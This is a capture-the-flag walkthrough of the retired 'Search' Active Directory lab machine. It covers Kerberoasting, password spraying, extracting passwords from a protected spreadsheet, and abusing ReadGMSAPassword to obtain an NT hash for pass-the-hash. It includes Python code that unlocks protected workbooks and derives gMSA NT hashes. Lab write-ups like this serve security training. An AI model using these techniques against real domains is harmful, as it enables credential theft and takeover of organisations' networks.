Search is a retired Windows machine (search.htb) built around an Active Directory domain. The goal is to obtain the user and root flags by chaining its weaknesses.
We start with an nmap scan to identify the target.
Classic Scan

Full Port Scan

The port scan shows an Active Directory domain controller and the search.htb domain. We add the domain to /etc/hosts and enumerate the open ports.
Anonymous enumeration of DNS (53), RPC (135), LDAP (389) and SMB (445) yields nothing. (We also find http://research.search.htb/ and http://portal.search.htb/, which serve the same content as port 80.)
Next we enumerate the web service on ports 80/443.

We checked the developer tools, a web technology analyzer and the page source, and ran a directory scan with gobuster, without finding anything useful.
The web interface itself, however, leaks a hint about a password.

Looking closely, we can read the following text (a hint about possible credentials):
Send password to Hope Sharp
It says to send a password to the user Hope Sharp, so we first build a list of possible usernames.

We collect the possible users.

We take the employee names from the "Our Team" section of the website:
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
These are the names we will work with.
Next we try to find the username format for Hope Sharp, the user that may hold the credentials, by brute force against SMB.
We do this with crackmapexec smb.

We find valid credentials.
With these credentials we enumerate SMB, browse the shares accessible to hope.sharp and list all files and directories, but find nothing useful.

We enumerate LDAP with the same credentials.

That does not give us anything either.
We try to dump the LDAP data with the ldapdomaindump tool instead.

This gives us data; now let's gather Active Directory information with BloodHound.

We upload the generated files to BloodHound.

Looking at the data, hope.sharp has no interesting access.
In the Analysis section, "List all Kerberoastable Accounts" shows two users.

Here we perform a Kerberoasting attack.
Using hope.sharp's credentials with Impacket's GetUserSPNs.py returns a TGS hash for the web_svc account:

We crack the hash with john.

We get its password.
BloodHound shows nothing interesting for the web_svc user.
SMB access with this account yields no data either.
So we password spray, in case the same password is reused by other domain users.

We find valid credentials.
Let's connect over SMB with them. (We could not find the user flag, but we found a Phishing_Attempt.xlsx file.)

We analyze the Phishing_Attempt file.

Notice that column C is hidden and the sheet is protected, so the column cannot be unhidden from the spreadsheet application.
Sheet protection is not encryption: an .xlsx file is just a ZIP archive of XML parts, so we can unzip it and read the contents directly.

After unzipping we check all the files.
In xl/worksheets/sheet2.xml we find the sheet protection element (a SHA-512 hash of the protection password) together with the cells that hold the usernames.

After a little more analysis, we find the passwords in xl/sharedStrings.xml.

We found the passwords here.
Another solution is to remove the sheetProtection element from the worksheet XML in the unzipped files and then zip them back up.
2nd way

Removing sheetProtection
Then the file can be saved and read normally.
Now we try to find valid credentials by brute forcing with the user and password lists we obtained.
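Both routes from the steps above, as an added example that is not part of the original write-up: read the shared strings and cell values straight out of the ZIP container (route 1), and strip the sheetProtection element plus the column hiding so the workbook opens unlocked (route 2). The workbook built inline is constructed for the demo with made-up names and passwords, and its SHA-512 hash and salt values are placeholders, not real protection hashes.

```python
"""Analyse a sheet-protected .xlsx without the spreadsheet application (added example)."""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}
SHEET = "xl/worksheets/sheet2.xml"


def _q(tag: str) -> str:
    """Namespace-qualified tag for ElementTree lookups."""
    return f"{{{MAIN_NS}}}{tag}"


# Constructed worksheet: column C hidden and the sheet protected (placeholder hash/salt).
SHEET2_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <cols><col min="3" max="3" width="0" hidden="1" customWidth="1"/></cols>
  <sheetData>
    <row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c><c r="C1" t="s"><v>2</v></c></row>
    <row r="2"><c r="A2" t="s"><v>3</v></c><c r="B2" t="s"><v>4</v></c><c r="C2" t="s"><v>5</v></c></row>
    <row r="3"><c r="A3" t="s"><v>6</v></c><c r="B3" t="s"><v>7</v></c><c r="C3" t="s"><v>8</v></c></row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="AAAA" saltValue="BBBB" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
</worksheet>"""

# Constructed shared-string table (made-up names and passwords).
SHARED_STRINGS_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9" uniqueCount="9">
  <si><t>Name</t></si><si><t>Username</t></si><si><t>Password</t></si>
  <si><t>Alice Example</t></si><si><t>alice.example</t></si><si><t>Winter2021!</t></si>
  <si><t>Bob Sample</t></si><si><t>bob.sample</t></si><si><t>Spring2022!</t></si>
</sst>"""


def build_sample_xlsx() -> bytes:
    """Minimal archive holding only the two parts this analysis needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(SHEET, SHEET2_XML)
        z.writestr("xl/sharedStrings.xml", SHARED_STRINGS_XML)
    return buf.getvalue()


def _part(xlsx: bytes, name: str) -> ET.Element:
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        return ET.fromstring(z.read(name))


def shared_strings(xlsx: bytes) -> list[str]:
    """All strings in xl/sharedStrings.xml in index order (rich-text runs joined)."""
    root = _part(xlsx, "xl/sharedStrings.xml")
    return ["".join(t.text or "" for t in si.iter(_q("t"))) for si in root.findall("m:si", NS)]


def sheet_cells(xlsx: bytes, sheet: str = SHEET) -> dict[str, str]:
    """Cell reference -> value, resolving shared-string (t="s") and inline-string cells."""
    strings = shared_strings(xlsx)
    cells: dict[str, str] = {}
    for c in _part(xlsx, sheet).iter(_q("c")):
        if c.get("t") == "inlineStr":
            cells[c.get("r")] = "".join(t.text or "" for t in c.iter(_q("t")))
            continue
        v = c.find("m:v", NS)
        if v is None:
            continue
        cells[c.get("r")] = strings[int(v.text)] if c.get("t") == "s" else (v.text or "")
    return cells


def sheet_protection(xlsx: bytes, sheet: str = SHEET) -> dict | None:
    """Attributes of the sheetProtection element, or None when the sheet is not protected."""
    el = _part(xlsx, sheet).find("m:sheetProtection", NS)
    return dict(el.attrib) if el is not None else None


def hidden_columns(xlsx: bytes, sheet: str = SHEET) -> list[int]:
    """1-based indexes of columns flagged hidden="1"."""
    return [int(col.get("min")) for col in _part(xlsx, sheet).iter(_q("col")) if col.get("hidden") == "1"]


def unlock(xlsx: bytes) -> bytes:
    """Route 2: drop sheetProtection and hidden="1" from every worksheet and re-zip."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(xlsx)) as zin, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename.startswith("xl/worksheets/") and item.filename.endswith(".xml"):
                data = re.sub(rb"<sheetProtection\b[^>]*?/>", b"", data)
                data = re.sub(rb'(<col\b[^>]*?)\s+hidden="1"', rb"\1", data)
            zout.writestr(item.filename, data)
    return out.getvalue()


if __name__ == "__main__":
    import sys

    src = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xlsx()
    print("protection:", sheet_protection(src))
    print("hidden columns:", hidden_columns(src))
    for ref, val in sorted(sheet_cells(src).items()):
        print(ref, val)
    with open("unlocked.xlsx", "wb") as fh:
        fh.write(unlock(src))
```

Run it against the real file with `python3 xlsx_unlock.py Phishing_Attempt.xlsx`: the cell dump already gives the hidden column C, and unlocked.xlsx opens without protection. Neither route needs the protection password, because the SHA-512 value in sheetProtection only gates the Unprotect Sheet button in the application.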

We find valid credentials and enumerate SMB with them, which gives us the user flag.

We have the user flag.
Nothing else changed in the information we had, so we go back to BloodHound.
We focus on the user SIERRA.FRYE.

Our user SIERRA.FRYE is a member of the BIRMINGHAM-ITSEC group, which is nested in the ITSEC group. The ITSEC group in turn has the ReadGMSAPassword edge on the BIR-ADFS-GMSA account.
Let's abuse ReadGMSAPassword.

A Group Managed Service Account (gMSA) is a special Active Directory account whose password is generated and rotated automatically by the domain at a fixed interval (the password is exposed through the msDS-ManagedPassword attribute and the rotation interval through msDS-ManagedPasswordInterval).
The intended use is that specific computer accounts, listed in msDS-GroupMSAMembership, retrieve the gMSA password and run local services as the gMSA. An attacker who controls one of those authorized principals can read the password and impersonate the gMSA.

If the gMSA is currently logged on to a computer, which is its intended behaviour, and that computer account is allowed to retrieve the gMSA's password, we only need to steal a token from, or inject into, a process running as the gMSA.
If the gMSA is not logged on, we can create a scheduled task or service that runs as the gMSA; it starts as the gMSA, and that logon can then be abused in the same way as any standard user running processes on the machine.
Finally, from our attacking machine we can use gMSADumper.py to read the managed password and obtain its NT hash:
gMSADumper.py -u 'user' -p 'password' -d 'domain.local'
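What gMSADumper.py does with the attribute once it has read it, as an added example that is not the tool's own code: the raw msDS-ManagedPassword value is an MSDS-MANAGEDPASSWORD_BLOB (layout per MS-ADTS, a 16-byte header of offsets followed by the current password, optional previous password and two intervals), and the NT hash is simply MD4 over the UTF-16LE password with its null terminator stripped. MD4 is implemented inline because hashlib's md4 is frequently unavailable on OpenSSL 3. The blob fed in below is constructed with the password "password"; real gMSA passwords are 256 random bytes, which is why the hash rather than the cleartext is what you take away.

```python
"""Parse msDS-ManagedPassword and derive the gMSA NT hash (added example)."""
from __future__ import annotations

import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Plain MD4 (RFC 1320): pad, then three rounds of 16 steps per 64-byte block."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)          # round 1: choose
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)  # round 2: majority
    k = lambda x, y, z: x ^ y ^ z                    # round 3: parity
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):
            a = _rotl((a + f(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + g(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + k(b, c, d) + X[order3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 of the UTF-16LE password, as hex."""
    return md4(password_utf16le).hex()


def parse_managed_password(blob: bytes) -> dict:
    """Fields of MSDS-MANAGEDPASSWORD_BLOB: version, reserved, length, then four offsets."""
    if len(blob) < 16:
        raise ValueError("blob too short for the 16-byte header")
    version, _reserved, length, cur_off, prev_off, query_off, unchanged_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError(f"unexpected version {version} or length {length} != {len(blob)}")
    # The current password runs up to the previous password if one is present,
    # otherwise up to the query-interval field (same rule gMSADumper applies).
    current = blob[cur_off:prev_off if prev_off else query_off]
    previous = blob[prev_off:query_off] if prev_off else b""
    query_interval, = struct.unpack_from("<Q", blob, query_off)
    unchanged_interval, = struct.unpack_from("<Q", blob, unchanged_off)
    # Passwords are null-terminated UTF-16LE; the terminator is not part of the hash input.
    current = current[:-2] if current.endswith(b"\x00\x00") else current
    previous = previous[:-2] if previous.endswith(b"\x00\x00") else previous
    return {
        "current_nt_hash": nt_hash(current),
        "previous_nt_hash": nt_hash(previous) if previous else None,
        "query_interval_100ns": query_interval,
        "unchanged_interval_100ns": unchanged_interval,
    }


def build_sample_blob(password: str, interval_100ns: int = 36_000_000_000) -> bytes:
    """Constructed blob for the demo: header, one current password, two intervals."""
    pw = password.encode("utf-16-le") + b"\x00\x00"
    cur_off = 16
    query_off = cur_off + len(pw)
    unchanged_off = query_off + 8
    length = unchanged_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, length, cur_off, 0, query_off, unchanged_off)
    return header + pw + struct.pack("<Q", interval_100ns) + struct.pack("<Q", interval_100ns)


if __name__ == "__main__":
    print(parse_managed_password(build_sample_blob("password")))
    # Against a real DC the raw attribute is read over LDAP (msDS-ManagedPassword
    # is only returned to principals listed in msDS-GroupMSAMembership) and the
    # bytes are fed to parse_managed_password(); gMSADumper.py bundles both steps.
```

The resulting hex string is exactly what goes into `-hashes :<nt_hash>` for the Impacket tools in the next step; with the constructed blob it is the familiar NT hash of "password", 8846f7eaee8fb117ad06bdd830b7586c.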

With the NT hash obtained here we can use pass-the-hash, overpass-the-hash or any other hash-based technique.

Using the gMSA hash we act as that account over RPC against the user we are targeting.
We reset that user's password.

We cannot connect with evil-winrm here, so we connect with smbclient instead.

This is how we obtain the root flag.